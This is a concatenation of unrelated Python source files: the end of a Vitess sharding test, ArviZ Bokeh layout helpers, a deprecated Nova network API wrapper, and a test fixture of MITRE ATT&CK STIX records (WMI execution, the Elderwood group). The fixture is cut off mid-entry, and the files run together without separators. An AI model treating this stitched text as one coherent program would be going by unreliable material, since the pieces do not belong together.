utils.run_vtctl_json(['GetShard', 'test_keyspace/1']) self.assertEqual(len(s['served_types']), 3) utils.run_vtctl(['InitShardMaster', 'test_keyspace/1', shard_1_master.tablet_alias], auto_log=True) utils.run_vtctl(['CopySchemaShard', shard_0_rdonly.tablet_alias, 'test_keyspace/1'], auto_log=True) for t in [shard_1_master, shard_1_rdonly]: utils.run_vtctl(['RefreshState', t.tablet_alias], auto_log=True) t.wait_for_vttablet_state('SERVING') # rebuild the keyspace serving graph now that the new shard was added utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True) # insert data on shard 1 self._insert_data('1', 200, 10) # re-read shard 1 data self._check_data('1', 200, 10) # create a second table on all shards sql = '''create table data2( id bigint auto_increment, name varchar(64), primary key (id) ) Engine=InnoDB''' utils.run_vtctl(['ApplySchema', '-sql=' + sql, 'test_keyspace'], auto_log=True) # reload schema everywhere so the QueryService knows about the tables for t in [shard_0_master, shard_0_rdonly, shard_1_master, shard_1_rdonly]: utils.run_vtctl(['ReloadSchema', t.tablet_alias], auto_log=True) # insert and read data on all shards self._insert_data('0', 300, 10, table='data2') self._insert_data('1', 400, 10, table='data2') self._check_data('0', 300, 10, table='data2') self._check_data('1', 400, 10, table='data2') utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True) self._check_shards_count_in_srv_keyspace(2) # Now test SplitQuery API works (used in MapReduce usually, but bringing # up a full MR-capable cluster is too much for this test environment) sql = 'select id, name from data' s = utils.vtgate.split_query(sql, 'test_keyspace', 4) self.assertEqual(len(s), 4) shard0count = 0 shard1count = 0 for q in s: if q['shard_part']['shards'][0] == '0': shard0count += 1 if q['shard_part']['shards'][0] == '1': shard1count += 1 self.assertEqual(shard0count, 2) self.assertEqual(shard1count, 2) # run the queries, aggregate the results, make sure we have all rows rows = {} for q in s: bindvars = {} for name, value in q['query']['bind_variables'].iteritems(): # vtctl encodes bytes as base64. bindvars[name] = int(base64.standard_b64decode(value['value'])) qr = utils.vtgate.execute_shards( q['query']['sql'], 'test_keyspace', ','.join(q['shard_part']['shards']), tablet_type='master', bindvars=bindvars) for r in qr['Rows']: rows[int(r[0])] = r[1] self.assertEqual(len(rows), 20) expected = {} for i in xrange(10): expected[100 + i] = 'row %d' % (100 + i) expected[200 + i] = 'row %d' % (200 + i) self.assertEqual(rows, expected) self._test_vtclient_execute_shards_fallback() def _check_shards_count_in_srv_keyspace(self, shard_count): ks = utils.run_vtctl_json(['GetSrvKeyspace', 'test_nj', 'test_keyspace']) check_types = set([topodata_pb2.MASTER, topodata_pb2.RDONLY]) for p in ks['partitions']: if p['served_type'] in check_types: self.assertEqual(len(p['shard_references']), shard_count) check_types.remove(p['served_type']) self.assertEqual(len(check_types), 0, 'The number of expected shard_references in GetSrvKeyspace' ' was not equal %d for all expected tablet types.' % shard_count) def _test_vtclient_execute_shards_fallback(self): """Test per-shard mode of Go SQL driver (through vtclient).""" for shard in [0, 1]: id_val = (shard + 1) * 1000 # example: 1000, 2000 name_val = 'row %d' % id_val # write utils.vtgate.vtclient('insert into data(id, name) values (:v1, :v2)', bindvars=[id_val, name_val], keyspace='test_keyspace', shard=str(shard)) want = ['Index\tid\tname', '0\t%d\t%s' % (id_val, name_val)] # read non-streaming out, _ = utils.vtgate.vtclient( 'select * from data where id = :v1', bindvars=[id_val], keyspace='test_keyspace', shard=str(shard)) self.assertEqual(out, want) # read streaming out, _ = utils.vtgate.vtclient( 'select * from data where id = :v1', bindvars=[id_val], keyspace='test_keyspace', shard=str(shard), streaming=True) self.assertEqual(out, want) if __name__ == '__main__': utils.main()
# pylint: disable=no-member,invalid-name,redefined-outer-name """ArviZ plotting backends.""" import re import numpy as np from pandas import DataFrame from ...rcparams import rcParams __all__ = [ "to_cds", "output_notebook", "output_file", "ColumnDataSource", "create_layout", "show_layout", ] def to_cds( data, var_names=None, groups=None, dimensions=None, group_info=True, var_name_format=None, index_origin=None, ): """Transform data to ColumnDataSource (CDS) compatible with Bokeh. Uses `_ARVIZ_GROUP_` and `_ARVIZ_CDS_SELECTION_` to separate var_name from group and dimensions in CDS columns. Parameters ---------- data : obj Any object that can be converted to an az.InferenceData object Refer to documentation of az.convert_to_inference_data for details var_names : str or list of str, optional Variables to be processed, if None all variables are processed. groups : str or list of str, optional Select groups for CDS. Default groups are {"posterior_groups", "prior_groups", "posterior_groups_warmup"} - posterior_groups: posterior, posterior_predictive, sample_stats - prior_groups: prior, prior_predictive, sample_stats_prior - posterior_groups_warmup: warmup_posterior, warmup_posterior_predictive, warmup_sample_stats ignore_groups : str or list of str, optional Ignore specific groups from CDS. dimension : str, or list of str, optional Select dimensions along to slice the data. By default uses ("chain", "draw"). group_info : bool Add group info for `var_name_format` var_name_format : str or tuple of tuple of string, optional Select column name format for non-scalar input. Predefined options are {"brackets", "underscore", "cds"} "brackets": - add_group_info == False: ``theta[0,0]`` - add_group_info == True: ``theta_posterior[0,0]`` "underscore": - add_group_info == False: ``theta_0_0`` - add_group_info == True: ``theta_posterior_0_0_`` "cds": - add_group_info == False: ``theta_ARVIZ_CDS_SELECTION_0_0`` - add_group_info == True: ``theta_ARVIZ_GROUP_posterior__ARVIZ_CDS_SELECTION_0_0`` tuple: Structure: - tuple: (dim_info, group_info) - dim_info: (str: `.join` separator, str: dim_separator_start, str: dim_separator_end) - group_info: (str: group separator start, str: group separator end) Example: ((",", "[", "]"), ("_", "")) - add_group_info == False: ``theta[0,0]`` - add_group_info == True: ``theta_posterior[0,0]`` index_origin : int, optional Start parameter indices from `index_origin`. Either 0 or 1. Returns ------- bokeh.models.ColumnDataSource object """ from ...utils import flatten_inference_data_to_dict if var_name_format is None: var_name_format = "cds" cds_dict = flatten_inference_data_to_dict( data=data, var_names=var_names, groups=groups, dimensions=dimensions, group_info=group_info, index_origin=index_origin, var_name_format=var_name_format, ) cds_data = ColumnDataSource(DataFrame.from_dict(cds_dict, orient="columns")) return cds_data def output_notebook(*args, **kwargs): """Wrap func:`bokeh.plotting.output_notebook`.""" import bokeh.plotting as bkp return bkp.output_notebook(*args, **kwargs) def output_file(*args, **kwargs): """Wrap :func:`bokeh.plotting.output_file`.""" import bokeh.plotting as bkp return bkp.output_file(*args, **kwargs) def ColumnDataSource(*args, **kwargs): """Wrap bokeh.models.ColumnDataSource.""" from bokeh.models import ColumnDataSource return ColumnDataSource(*args, **kwargs) def create_layout(ax, force_layout=False): """Transform bokeh array of figures to layout.""" ax = np.atleast_2d(ax) subplot_order = rcParams["plot.bokeh.layout.order"] if force_layout: from bokeh.layouts import gridplot as layout ax = ax.tolist() layout_args = { "sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"], "toolbar_location": rcParams["plot.bokeh.layout.toolbar_location"], } elif any(item in subplot_order for item in ("row", "column")): # check number of rows match = re.match(r"(\d*)(row|column)", subplot_order) n = int(match.group(1)) if match.group(1) is not None else 1 subplot_order = match.group(2) # set up 1D list of axes ax = [item for item in ax.ravel().tolist() if item is not None] layout_args = {"sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"]} if subplot_order == "row" and n == 1: from bokeh.layouts import row as layout elif subplot_order == "column" and n == 1: from bokeh.layouts import column as layout else: from bokeh.layouts import layout if n != 1: ax = np.array(ax + [None for _ in range(int(np.ceil(len(ax) / n)) - len(ax))]) if subplot_order == "row": ax = ax.reshape(n, -1) else: ax = ax.reshape(-1, n) ax = ax.tolist() else: if subplot_order in ("square", "square_trimmed"): ax = [item for item in ax.ravel().tolist() if item is not None] n = int(np.ceil(len(ax) ** 0.5)) ax = ax + [None for _ in range(n ** 2 - len(ax))] ax = np.array(ax).reshape(n, n) ax = ax.tolist() if (subplot_order == "square_trimmed") and any( all(item is None for item in row) for row in ax ): from bokeh.layouts import layout ax = [row for row in ax if not all(item is None for item in row)] layout_args = {"sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"]} else: from bokeh.layouts import gridplot as layout layout_args = { "sizing_mode": rcParams["plot.bokeh.layout.sizing_mode"], "toolbar_location": rcParams["plot.bokeh.layout.toolbar_location"], } # ignore "fixed" sizing_mode without explicit width and height if layout_args.get("sizing_mode", "") == "fixed": layout_args.pop("sizing_mode") return layout(ax, **layout_args) def show_layout(ax, show=True, force_layout=False): """Create a layout and call bokeh show.""" if show is None: show = rcParams["plot.bokeh.show"] if show: import bokeh.plotting as bkp layout = create_layout(ax, force_layout=force_layout) bkp.show(layout) def _copy_docstring(lib, function): """Extract docstring from function.""" import importlib try: module = importlib.import_module(lib) func = getattr(module, function) doc = func.__doc__ except ImportError: doc = f"Failed to import function {function} from {lib}" if not isinstance(doc, str): doc = "" return doc # TODO: try copying substitutions too, or autoreplace them ourselves output_notebook.__doc__ += "\n\n" + _copy_docstring("bokeh.plotting", "output_notebook") output_file.__doc__ += "\n\n" + _copy_docstring("bokeh.plotting", "output_file") ColumnDataSource.__doc__ += "\n\n" + _copy_docstring("bokeh.models", "ColumnDataSource")
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright (c) 2011 X.commerce, a business unit of eBay Inc. # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ This version of the api is deprecated in Grizzly and will be removed. It is provided just in case a third party manager is in use. """ from nova.db import base from nova import exception from nova.network import api as shiny_api from nova.network import model as network_model from nova.network import rpcapi as network_rpcapi from nova.openstack.common import log as logging LOG = logging.getLogger(__name__) refresh_cache = shiny_api.refresh_cache _update_instance_cache = shiny_api.update_instance_cache_with_nw_info update_instance_cache_with_nw_info = _update_instance_cache wrap_check_policy = shiny_api.wrap_check_policy class API(base.Base): """API for doing networking via the nova-network network manager. This is a pluggable module - other implementations do networking via other services (such as Quantum). """ _sentinel = object() def __init__(self, **kwargs): self.network_rpcapi = network_rpcapi.NetworkAPI() super(API, self).__init__(**kwargs) @wrap_check_policy def get_all(self, context): return self.network_rpcapi.get_all_networks(context) @wrap_check_policy def get(self, context, network_uuid): return self.network_rpcapi.get_network(context, network_uuid) @wrap_check_policy def create(self, context, **kwargs): return self.network_rpcapi.create_networks(context, **kwargs) @wrap_check_policy def delete(self, context, network_uuid): return self.network_rpcapi.delete_network(context, network_uuid, None) @wrap_check_policy def disassociate(self, context, network_uuid): return self.network_rpcapi.disassociate_network(context, network_uuid) @wrap_check_policy def get_fixed_ip(self, context, id): return self.network_rpcapi.get_fixed_ip(context, id) @wrap_check_policy def get_fixed_ip_by_address(self, context, address): return self.network_rpcapi.get_fixed_ip_by_address(context, address) @wrap_check_policy def get_floating_ip(self, context, id): return self.network_rpcapi.get_floating_ip(context, id) @wrap_check_policy def get_floating_ip_pools(self, context): return self.network_rpcapi.get_floating_ip_pools(context) @wrap_check_policy def get_floating_ip_by_address(self, context, address): return self.network_rpcapi.get_floating_ip_by_address(context, address) @wrap_check_policy def get_floating_ips_by_project(self, context): return self.network_rpcapi.get_floating_ips_by_project(context) @wrap_check_policy def get_floating_ips_by_fixed_address(self, context, fixed_address): args = (context, fixed_address) return self.network_rpcapi.get_floating_ips_by_fixed_address(*args) @wrap_check_policy def get_backdoor_port(self, context, host): return self.network_rpcapi.get_backdoor_port(context, host) @wrap_check_policy def get_instance_id_by_floating_address(self, context, address): # NOTE(tr3buchet): i hate this return self.network_rpcapi.get_instance_id_by_floating_address(context, address) @wrap_check_policy def get_vifs_by_instance(self, context, instance): return self.network_rpcapi.get_vifs_by_instance(context, instance['id']) @wrap_check_policy def get_vif_by_mac_address(self, context, mac_address): return self.network_rpcapi.get_vif_by_mac_address(context, mac_address) @wrap_check_policy def allocate_floating_ip(self, context, pool=None): """Adds (allocates) a floating ip to a project from a pool.""" # NOTE(vish): We don't know which network host should get the ip # when we allocate, so just send it to any one. This # will probably need to move into a network supervisor # at some point. return self.network_rpcapi.allocate_floating_ip(context, context.project_id, pool, False) @wrap_check_policy def release_floating_ip(self, context, address, affect_auto_assigned=False): """Removes (deallocates) a floating ip with address from a project.""" args = (context, address, affect_auto_assigned) return self.network_rpcapi.deallocate_floating_ip(*args) @wrap_check_policy @refresh_cache def associate_floating_ip(self, context, instance, floating_address, fixed_address, affect_auto_assigned=False): """Associates a floating ip with a fixed ip. ensures floating ip is allocated to the project in context """ args = (context, floating_address, fixed_address, affect_auto_assigned) orig_instance_uuid = self.network_rpcapi.associate_floating_ip(*args) if orig_instance_uuid: msg_dict = dict(address=floating_address, instance_id=orig_instance_uuid) LOG.info(_('re-assign floating IP %(address)s from ' 'instance %(instance_id)s') % msg_dict) orig_instance = self.db.instance_get_by_uuid(context, orig_instance_uuid) # purge cached nw info for the original instance update_instance_cache_with_nw_info(self, context, orig_instance) @wrap_check_policy @refresh_cache def disassociate_floating_ip(self, context, instance, address, affect_auto_assigned=False): """Disassociates a floating ip from fixed ip it is associated with.""" self.network_rpcapi.disassociate_floating_ip(context, address, affect_auto_assigned) @wrap_check_policy @refresh_cache def allocate_for_instance(self, context, instance, vpn, requested_networks, macs=None, conductor_api=None, security_groups=None, **kwargs): """Allocates all network structures for an instance. TODO(someone): document the rest of these parameters. :param macs: None or a set of MAC addresses that the instance should use. macs is supplied by the hypervisor driver (contrast with requested_networks which is user supplied). NB: macs is ignored by nova-network. :returns: network info as from get_instance_nw_info() below """ args = {} args['vpn'] = vpn args['requested_networks'] = requested_networks args['instance_id'] = instance['uuid'] args['project_id'] = instance['project_id'] args['host'] = instance['host'] args['rxtx_factor'] = instance['instance_type']['rxtx_factor'] nw_info = self.network_rpcapi.allocate_for_instance(context, **args) return network_model.NetworkInfo.hydrate(nw_info) @wrap_check_policy def deallocate_for_instance(self, context, instance, **kwargs): """Deallocates all network structures related to instance.""" args = {} args['instance_id'] = instance['id'] args['project_id'] = instance['project_id'] args['host'] = instance['host'] self.network_rpcapi.deallocate_for_instance(context, **args) @wrap_check_policy @refresh_cache def add_fixed_ip_to_instance(self, context, instance, network_id, conductor_api=None, **kwargs): """Adds a fixed ip to instance from specified network.""" args = {'instance_id': instance['uuid'], 'host': instance['host'], 'network_id': network_id, 'rxtx_factor': None} self.network_rpcapi.add_fixed_ip_to_instance(context, **args) @wrap_check_policy @refresh_cache def remove_fixed_ip_from_instance(self, context, instance, address, conductor=None, **kwargs): """Removes a fixed ip from instance from specified network.""" args = {'instance_id': instance['uuid'], 'host': instance['host'], 'address': address, 'rxtx_factor': None} self.network_rpcapi.remove_fixed_ip_from_instance(context, **args) @wrap_check_policy def add_network_to_project(self, context, project_id, network_uuid=None): """Force adds another network to a project.""" self.network_rpcapi.add_network_to_project(context, project_id, network_uuid) @wrap_check_policy def associate(self, context, network_uuid, host=_sentinel, project=_sentinel): """Associate or disassociate host or project to network.""" associations = {} if host is not API._sentinel: associations['host'] = host if project is not API._sentinel: associations['project'] = project self.network_rpcapi.associate(context, network_uuid, associations) @wrap_check_policy def get_instance_nw_info(self, context, instance, conductor_api=None, **kwargs): """Returns all network info related to an instance.""" result = self._get_instance_nw_info(context, instance) update_instance_cache_with_nw_info(self, context, instance, result, conductor_api) return result def _get_instance_nw_info(self, context, instance): """Returns all network info related to an instance.""" args = {'instance_id': instance['uuid'], 'rxtx_factor': instance['instance_type']['rxtx_factor'], 'host': instance['host'], 'project_id': instance['project_id']} nw_info = self.network_rpcapi.get_instance_nw_info(context, **args) return network_model.NetworkInfo.hydrate(nw_info) @wrap_check_policy def validate_networks(self, context, requested_networks): """validate the networks passed at the time of creating the server """ return self.network_rpcapi.validate_networks(context, requested_networks) @wrap_check_policy def get_instance_uuids_by_ip_filter(self, context, filters): """Returns a list of dicts in the form of {'instance_uuid': uuid, 'ip': ip} that matched the ip_filter """ return self.network_rpcapi.get_instance_uuids_by_ip_filter(context, filters) @wrap_check_policy def get_dns_domains(self, context): """Returns a list of available dns domains. These can be used to create DNS entries for floating ips. """ return self.network_rpcapi.get_dns_domains(context) @wrap_check_policy def add_dns_entry(self, context, address, name, dns_type, domain): """Create specified DNS entry for address.""" args = {'address': address, 'name': name, 'dns_type': dns_type, 'domain': domain} return self.network_rpcapi.add_dns_entry(context, **args) @wrap_check_policy def modify_dns_entry(self, context, name, address, domain): """Create specified DNS entry for address.""" args = {'address': address, 'name': name, 'domain': domain} return self.network_rpcapi.modify_dns_entry(context, **args) @wrap_check_policy def delete_dns_entry(self, context, name, domain): """Delete the specified dns entry.""" args = {'name': name, 'domain': domain} return self.network_rpcapi.delete_dns_entry(context, **args) @wrap_check_policy def delete_dns_domain(self, context, domain): """Delete the specified dns domain.""" return self.network_rpcapi.delete_dns_domain(context, domain=domain) @wrap_check_policy def get_dns_entries_by_address(self, context, address, domain): """Get entries for address and domain.""" args = {'address': address, 'domain': domain} return self.network_rpcapi.get_dns_entries_by_address(context, **args) @wrap_check_policy def get_dns_entries_by_name(self, context, name, domain): """Get entries for name and domain.""" args = {'name': name, 'domain': domain} return self.network_rpcapi.get_dns_entries_by_name(context, **args) @wrap_check_policy def create_private_dns_domain(self, context, domain, availability_zone): """Create a private DNS domain with nova availability zone.""" args = {'domain': domain, 'av_zone': availability_zone} return self.network_rpcapi.create_private_dns_domain(context, **args) @wrap_check_policy def create_public_dns_domain(self, context, domain, project=None): """Create a public DNS domain with optional nova project.""" args = {'domain': domain, 'project': project} return self.network_rpcapi.create_public_dns_domain(context, **args) @wrap_check_policy def setup_networks_on_host(self, context, instance, host=None, teardown=False): """Setup or teardown the network structures on hosts related to instance""" host = host or instance['host'] # NOTE(tr3buchet): host is passed in cases where we need to setup # or teardown the networks on a host which has been migrated to/from # and instance['host'] is not yet or is no longer equal to args = {'instance_id': instance['id'], 'host': host, 'teardown': teardown} self.network_rpcapi.setup_networks_on_host(context, **args) def _is_multi_host(self, context, instance): try: fixed_ips = self.db.fixed_ip_get_by_instance(context, instance['uuid']) except exception.FixedIpNotFoundForInstance: return False network = self.db.network_get(context, fixed_ips[0]['network_id'], project_only='allow_none') return network['multi_host'] def _get_floating_ip_addresses(self, context, instance): args = (context, instance['uuid']) floating_ips = self.db.instance_floating_address_get_all(*args) return [floating_ip['address'] for floating_ip in floating_ips] @wrap_check_policy def migrate_instance_start(self, context, instance, migration): """Start to migrate the network of an instance.""" args = dict( instance_uuid=instance['uuid'], rxtx_factor=instance['instance_type']['rxtx_factor'], project_id=instance['project_id'], source_compute=migration['source_compute'], dest_compute=migration['dest_compute'], floating_addresses=None, ) if self._is_multi_host(context, instance): args['floating_addresses'] = \ self._get_floating_ip_addresses(context, instance) args['host'] = migration['source_compute'] self.network_rpcapi.migrate_instance_start(context, **args) @wrap_check_policy def migrate_instance_finish(self, context, instance, migration): """Finish migrating the network of an instance.""" args = dict( instance_uuid=instance['uuid'], rxtx_factor=instance['instance_type']['rxtx_factor'], project_id=instance['project_id'], source_compute=migration['source_compute'], dest_compute=migration['dest_compute'], floating_addresses=None, ) if self._is_multi_host(context, instance): args['floating_addresses'] = \ self._get_floating_ip_addresses(context, instance) args['host'] = migration['dest_compute'] self.network_rpcapi.migrate_instance_finish(context, **args) # NOTE(jkoelker) These functions where added to the api after # deprecation. Stubs provided for support documentation def allocate_port_for_instance(self, context, instance, port_id, network_id=None, requested_ip=None, conductor_api=None): raise NotImplementedError() def deallocate_port_for_instance(self, context, instance, port_id, conductor_api=None): raise NotImplementedError() def list_ports(self, *args, **kwargs): raise NotImplementedError() def show_port(self, *args, **kwargs): raise NotImplementedError()
ATTACK_PATTERN = { 'response': { "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "name": "ATTACK_PATTERN 1", "type": "attack-pattern", "modified": "2020-05-13T22:50:51.258Z", "created": "2017-05-31T21:30:44.329Z", "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.", "x_mitre_platforms": [ "Windows" ], "external_references": [ { "url": "https://attack.mitre.org/techniques/T1047", "source_name": "mitre-attack", "external_id": "T1047" }, { "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", "source_name": "Wikipedia SMB", "url": "https://en.wikipedia.org/wiki/Server_Message_Block" }, { "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", "source_name": "TechNet RPC", "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx" }, ], "kill_chain_phases": [ { "phase_name": "defense-evasion", "kill_chain_name": "mitre-attack" }, { "phase_name": "privilege-escalation", "kill_chain_name": "mitre-attack" } ] }, 'map_result': { 'stixid': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055', 'firstseenbysource': '2017-05-31T21:30:44.329Z', 'killchainphases': ['Defense Evasion', 'Privilege Escalation'], 'modified': "2020-05-13T22:50:51.258Z", 'description': "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.", 'operatingsystemrefs': ['Windows'], 'mitreid': 'T1047', 'publications': [{'link': "https://en.wikipedia.org/wiki/Server_Message_Block", 'title': "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", 'source': 'Wikipedia SMB'}, {'link': "https://technet.microsoft.com/en-us/library/cc787851.aspx", 'title': 'Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.', "source": 'TechNet RPC'}], 'tags': ['T1047'] }, 'indicator': ([{'fields': {'description': 'Adversaries may abuse Windows Management ' 'Instrumentation (WMI) to achieve execution.', 'firstseenbysource': '2017-05-31T21:30:44.329Z', 'killchainphases': ['Defense Evasion', 'Privilege Escalation'], 'mitreid': 'T1047', 'modified': '2020-05-13T22:50:51.258Z', 'operatingsystemrefs': ['Windows'], 'publications': [{'link': 'https://en.wikipedia.org/wiki/Server_Message_Block', 'source': 'Wikipedia SMB', 'title': 'Wikipedia. (2016, June 12). Server ' 'Message Block. Retrieved June 12, ' '2016.'}, {'link': 'https://technet.microsoft.com/en-us/library/cc787851.aspx', 'source': 'TechNet RPC', 'title': 'Microsoft. (2003, March 28). What Is ' 'RPC?. Retrieved June 12, 2016.'}], 'stixid': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055', 'tags': ['T1047']}, 'rawJSON': {'created': '2017-05-31T21:30:44.329Z', 'description': 'Adversaries may abuse Windows Management ' 'Instrumentation (WMI) to achieve execution.', 'external_references': [{'external_id': 'T1047', 'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/techniques/T1047'}, {'description': 'Wikipedia. (2016, June ' '12). Server Message ' 'Block. Retrieved June ' '12, 2016.', 'source_name': 'Wikipedia SMB', 'url': 'https://en.wikipedia.org/wiki/Server_Message_Block'}, {'description': 'Microsoft. (2003, ' 'March 28). What Is ' 'RPC?. Retrieved June ' '12, 2016.', 'source_name': 'TechNet RPC', 'url': 'https://technet.microsoft.com/en-us/library/cc787851.aspx'}], 'id': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055', 'kill_chain_phases': [{'kill_chain_name': 'mitre-attack', 'phase_name': 'defense-evasion'}, {'kill_chain_name': 'mitre-attack', 'phase_name': 'privilege-escalation'}], 'modified': '2020-05-13T22:50:51.258Z', 'name': 'ATTACK_PATTERN 1', 'type': 'attack-pattern', 'x_mitre_platforms': ['Windows']}, 'score': 2, 'type': 'Attack Pattern', 'value': 'ATTACK_PATTERN 1'}], [], {'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055': 'ATTACK_PATTERN 1'}, {'T1047': 'ATTACK_PATTERN 1'}) } STIX_ATTACK_PATTERN = { 'response': { "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "name": "ATTACK_PATTERN 1", "type": "attack-pattern", "modified": "2020-05-13T22:50:51.258Z", "created": "2017-05-31T21:30:44.329Z", "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.", "x_mitre_platforms": [ "Windows" ], "external_references": [ { "url": "https://attack.mitre.org/techniques/T1047", "source_name": "mitre-attack", "external_id": "T1047" }, { "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", "source_name": "Wikipedia SMB", "url": "https://en.wikipedia.org/wiki/Server_Message_Block" }, { "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", "source_name": "TechNet RPC", "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx" }, ], "kill_chain_phases": [ { "phase_name": "defense-evasion", "kill_chain_name": "mitre-attack" }, { "phase_name": "privilege-escalation", "kill_chain_name": "mitre-attack" } ] }, 'map_result': { 'stixid': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055', 'firstseenbysource': '2017-05-31T21:30:44.329Z', 'stixkillchainphases': ['Defense Evasion', 'Privilege Escalation'], 'modified': "2020-05-13T22:50:51.258Z", 'stixdescription': "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.", 'operatingsystemrefs': ['Windows'], 'mitreid': 'T1047', 'publications': [{'link': "https://en.wikipedia.org/wiki/Server_Message_Block", 'title': "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", 'source': 'Wikipedia SMB'}, {'link': "https://technet.microsoft.com/en-us/library/cc787851.aspx", 'title': 'Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.', "source": 'TechNet RPC'}], 'tags': ['T1047'] } } COURSE_OF_ACTION = { 'response': { "id": "course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22", "name": "COURSE_OF_ACTION 1", "type": "course-of-action", "description": "Prevent files from having a trailing space after the extension.", "modified": "2019-07-25T11:46:32.010Z", "external_references": [ { "external_id": "T1151", "source_name": "mitre-attack", "url": "https://attack.mitre.org/mitigations/T1151" } ], "created": "2018-10-17T00:14:20.652Z" }, 'map_result': {'description': 'Prevent files from having a trailing space after the ' 'extension.', 'firstseenbysource': '2018-10-17T00:14:20.652Z', 'mitreid': 'T1151', 'modified': '2019-07-25T11:46:32.010Z', 'publications': [], 'stixid': 'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22', 'tags': ['T1151']}, 'indicator': ([{'fields': {'description': 'Prevent files from having a trailing space after ' 'the extension.', 'firstseenbysource': '2018-10-17T00:14:20.652Z', 'mitreid': 'T1151', 'modified': '2019-07-25T11:46:32.010Z', 'publications': [], 'stixid': 'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22', 'tags': ['T1151']}, 'rawJSON': {'created': '2018-10-17T00:14:20.652Z', 'description': 'Prevent files from having a trailing space ' 'after the extension.', 'external_references': [{'external_id': 'T1151', 'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/mitigations/T1151'}], 'id': 'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22', 'modified': '2019-07-25T11:46:32.010Z', 'name': 'COURSE_OF_ACTION 1', 'type': 'course-of-action'}, 'score': 0, 'type': 'Course of Action', 'value': 'COURSE_OF_ACTION 1'}], [], {'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22': 'COURSE_OF_ACTION 1'}, {}) } INTRUSION_SET = { 'response': { "external_references": [ { "external_id": "G0066", "source_name": "mitre-attack", "url": "https://attack.mitre.org/groups/G0066" }, { "description": "(Citation: Security Affairs Elderwood Sept 2012)", "source_name": "Elderwood" }, ], "description": "[Elderwood](https://attack.mitre.org/groups/G0066)", "modified": "2021-03-02T22:40:11.097Z", "created": "2018-04-18T17:59:24.739Z", "aliases": [ "Elderwood", "Elderwood Gang", "Beijing Group", "Sneaky Panda" ], "id": "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484", "name": "INTRUSION_SET 1", "type": "intrusion-set" }, 'map_result': {'aliases': ['Elderwood', 'Elderwood Gang', 'Beijing Group', 'Sneaky Panda'], 'description': '[Elderwood](https://attack.mitre.org/groups/G0066)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'G0066', 'modified': '2021-03-02T22:40:11.097Z', 'publications': [{'link': None, 'source': 'Elderwood', 'title': '(Citation: Security Affairs Elderwood Sept ' '2012)'}], 'stixid': 'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484', 'tags': ['G0066']}, "indicator": ([{'fields': {'aliases': ['Elderwood', 'Elderwood Gang', 'Beijing Group', 'Sneaky Panda'], 'description': '[Elderwood](https://attack.mitre.org/groups/G0066)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'G0066', 'modified': '2021-03-02T22:40:11.097Z', 'publications': [{'link': None, 'source': 'Elderwood', 'title': '(Citation: Security Affairs ' 'Elderwood Sept 2012)'}], 'stixid': 'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484', 'tags': ['G0066']}, 'rawJSON': {'aliases': ['Elderwood', 'Elderwood Gang', 'Beijing Group', 'Sneaky Panda'], 'created': '2018-04-18T17:59:24.739Z', 'description': '[Elderwood](https://attack.mitre.org/groups/G0066)', 'external_references': [{'external_id': 'G0066', 'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0066'}, {'description': '(Citation: Security ' 'Affairs Elderwood Sept ' '2012)', 'source_name': 'Elderwood'}], 'id': 'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484', 'modified': '2021-03-02T22:40:11.097Z', 'name': 'INTRUSION_SET 1', 'type': 'intrusion-set'}, 'score': 3, 'type': 'Intrusion Set', 'value': 'INTRUSION_SET 1'}], [], {'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484': 'INTRUSION_SET 1'}, {}) } MALWARE = { 'response': { "description": "[Wiarp](https://attack.mitre.org/software/S0206)", "external_references": [ { "external_id": "S0206", "source_name": "mitre-attack", "url": "https://attack.mitre.org/software/S0206" }, { "description": "Zhou, R. 